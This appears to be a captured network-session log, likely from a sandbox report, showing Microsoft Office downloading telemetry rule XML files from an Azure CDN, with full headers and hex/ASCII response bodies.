2024-10-30 02:46:46 UTC192OUTGET /rules/rule120674v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:46 UTC491INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:46 GMT
Content-Type: text/xml
Content-Length: 474
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
ETag: "0x8DC582BA4037B0D"
x-ms-request-id: df439d9f-401e-0067-5610-2709c2000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024646Z-16849878b78p49s6zkwt11bbkn000000072g00000000csa4
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
X-Cache-Info: L1_T2
Accept-Ranges: bytes
2024-10-30 02:46:46 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session IDSource IPSource PortDestination IPDestination Port
74192.168.2.44982913.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:46 UTC192OUTGET /rules/rule120677v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:46 UTC470INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:46 GMT
Content-Type: text/xml
Content-Length: 405
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT
ETag: "0x8DC582B942B6AFF"
x-ms-request-id: 9577fd14-901e-0016-4fa3-26efe9000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024646Z-16849878b78bcpfn2qf7sm6hsn000000090000000000g693
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:46 UTC405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5e 5b 58 78 5d 5b 45 65 5d 5b 4e 6e 5d 24 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <


Session IDSource IPSource PortDestination IPDestination Port
75192.168.2.44983013.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:46 UTC192OUTGET /rules/rule120678v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:46 UTC491INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:46 GMT
Content-Type: text/xml
Content-Length: 468
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
ETag: "0x8DC582BBA642BF4"
x-ms-request-id: fd0e08e6-201e-0085-5f27-2634e3000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024646Z-r197bdfb6b4mcssrk8cfa4gm1g000000015g000000004yw8
x-fd-int-roxy-purgeid: 0
X-Cache-Info: L1_T2
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:46 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


Session IDSource IPSource PortDestination IPDestination Port
76192.168.2.44983213.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:46 UTC192OUTGET /rules/rule120680v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:47 UTC584INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:46 GMT
Content-Type: text/xml
Content-Length: 1952
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
ETag: "0x8DC582B956B0F3D"
x-ms-request-id: bb28544f-801e-0047-7562-267265000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024646Z-16849878b78z2wx67pvzz63kdg000000061g00000000amzy
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
X-Cache-Info: L1_T2
Accept-Ranges: bytes
2024-10-30 02:46:47 UTC1952INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 31 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>


Session IDSource IPSource PortDestination IPDestination Port
77192.168.2.44983113.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:46 UTC192OUTGET /rules/rule120679v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:47 UTC491INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:46 GMT
Content-Type: text/xml
Content-Length: 174
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
ETag: "0x8DC582B91D80E15"
x-ms-request-id: 2034bdf9-701e-003e-3056-2679b3000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024646Z-16849878b782d4lwcu6h6gmxnw000000072g00000000dm8g
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
X-Cache-Info: L1_T2
Accept-Ranges: bytes
2024-10-30 02:46:47 UTC174INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>


Session IDSource IPSource PortDestination IPDestination Port
78192.168.2.44983313.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:46 UTC192OUTGET /rules/rule120681v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:47 UTC491INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:46 GMT
Content-Type: text/xml
Content-Length: 958
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT
ETag: "0x8DC582BA0A31B3B"
x-ms-request-id: 080ba15e-001e-0082-732b-275880000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024646Z-16849878b785dznd7xpawq9gcn00000008tg00000000d98n
x-fd-int-roxy-purgeid: 0
X-Cache-Info: L1_T2
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:47 UTC958INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>


Session IDSource IPSource PortDestination IPDestination Port
79192.168.2.44983413.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:47 UTC192OUTGET /rules/rule120682v0s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:47 UTC491INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:47 GMT
Content-Type: text/xml
Content-Length: 501
Connection: close
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT
ETag: "0x8DC582BACFDAACD"
x-ms-request-id: 97ce691d-801e-0047-0a01-277265000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024647Z-16849878b787bfsh7zgp804my4000000069g000000002fw0
x-fd-int-roxy-purgeid: 0
X-Cache-Info: L1_T2
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:47 UTC501INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="


Session IDSource IPSource PortDestination IPDestination Port
80192.168.2.44983513.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:47 UTC193OUTGET /rules/rule120602v10s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:47 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:47 GMT
Content-Type: text/xml
Content-Length: 2592
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
ETag: "0x8DC582BB5B890DB"
x-ms-request-id: 6768b437-a01e-00ab-174d-279106000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024647Z-16849878b78fhxrnedubv5byks00000005tg0000000070um
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:47 UTC2592INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 32 22 20 56 3d 22 31 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 6e 64 4c 61 6e 67 75 61 67 65 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=


Session IDSource IPSource PortDestination IPDestination Port
81192.168.2.44983613.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:47 UTC192OUTGET /rules/rule120601v3s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:47 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:47 GMT
Content-Type: text/xml
Content-Length: 3342
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT
ETag: "0x8DC582B927E47E9"
x-ms-request-id: d72005e7-a01e-0002-1a61-285074000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024647Z-15b8d89586fzcfbd8we4bvhqds00000002ag00000000a063
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:47 UTC3342INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 4f 53 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI


Session IDSource IPSource PortDestination IPDestination Port
82192.168.2.44983813.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:47 UTC192OUTGET /rules/rule701201v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:47 UTC584INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:47 GMT
Content-Type: text/xml
Content-Length: 1393
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT
ETag: "0x8DC582BE3E55B6E"
x-ms-request-id: 2953fb54-101e-0028-3f94-298f64000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024647Z-17c5cb586f6hn8cl90dxzu28kw00000007ng0000000002eb
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
X-Cache-Info: L1_T2
Accept-Ranges: bytes
2024-10-30 02:46:47 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"


Session IDSource IPSource PortDestination IPDestination Port
83192.168.2.44983713.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:47 UTC193OUTGET /rules/rule224901v11s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:47 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:47 GMT
Content-Type: text/xml
Content-Length: 2284
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT
ETag: "0x8DC582BCD58BEEE"
x-ms-request-id: 20ac8722-c01e-00ad-30e6-27a2b9000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024647Z-17c5cb586f6f8m6jnehy0z65x400000006sg0000000056np
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:47 UTC2284INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 31 22 20 56 3d 22 31 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4c 69 63 65 6e 73 69 6e 67 2e 4f 66 66 69 63 65 43 6c 69 65 6e 74 4c 69 63 65 6e 73 69 6e 67 2e 44 6f 4c 69 63 65 6e 73 65 56 61 6c 69 64 61 74 69 6f 6e 22 20 41 54 54 3d 22 63 31 61 30 64 62 30 31 32 37 39 36 34 36 37 34 61 30 64 36 32 66 64 65 35 61 62 30 66 65 36 32 2d 36 65 63 34 61 63 34 35 2d 63 65 62 63 2d 34 66 38 30 2d 61 61 38 33 2d 62 36 62 39 64 33 61 38 36 65 64 37 2d 37 37 31 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 54 3d 22 55 70 6c 6f 61 64 2d 4d 65 64 69 75 6d 22
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"


Session IDSource IPSource PortDestination IPDestination Port
84192.168.2.44983913.107.246.45443
TimestampBytes transferredDirectionData
2024-10-30 02:46:47 UTC192OUTGET /rules/rule701200v1s19.xml HTTP/1.1
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Host: otelrules.azureedge.net
2024-10-30 02:46:48 UTC563INHTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 02:46:47 GMT
Content-Type: text/xml
Content-Length: 1356
Connection: close
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: public, max-age=604800, immutable
Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
ETag: "0x8DC582BDC681E17"
x-ms-request-id: 19a18c92-701e-0098-0fb0-26395f000000
x-ms-version: 2018-03-28
x-azure-ref: 20241030T024647Z-16849878b786lft2mu9uftf3y400000008kg00000000qxts
x-fd-int-roxy-purgeid: 0
X-Cache: TCP_HIT
Accept-Ranges: bytes
2024-10-30 02:46:48 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" /> <F T="2">


Session IDSource IPSource PortDestination IPDestination Port
85192.168.2.44984013.107.246.45443
